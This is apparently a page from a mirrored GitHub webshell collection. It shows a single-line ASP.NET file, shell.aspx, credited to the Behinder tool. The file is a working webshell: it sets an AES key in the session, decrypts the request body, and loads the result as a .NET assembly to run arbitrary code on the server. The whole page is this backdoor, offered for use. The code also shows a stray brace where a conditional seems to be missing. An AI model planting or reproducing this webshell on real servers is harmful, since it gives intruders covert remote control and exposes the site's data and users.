mirror of
https://github.com/tennc/webshell.git
synced 2025-12-06 12:51:28 +00:00
add shell.aspx shell.jsp shell.php with Behinder from : https://github.com/rebeyond/Behinder author: rebeyond 👍
1 line
400 B
Plaintext
1 line
400 B
Plaintext
<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); Response.Write(Session[0]); return;}byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%> |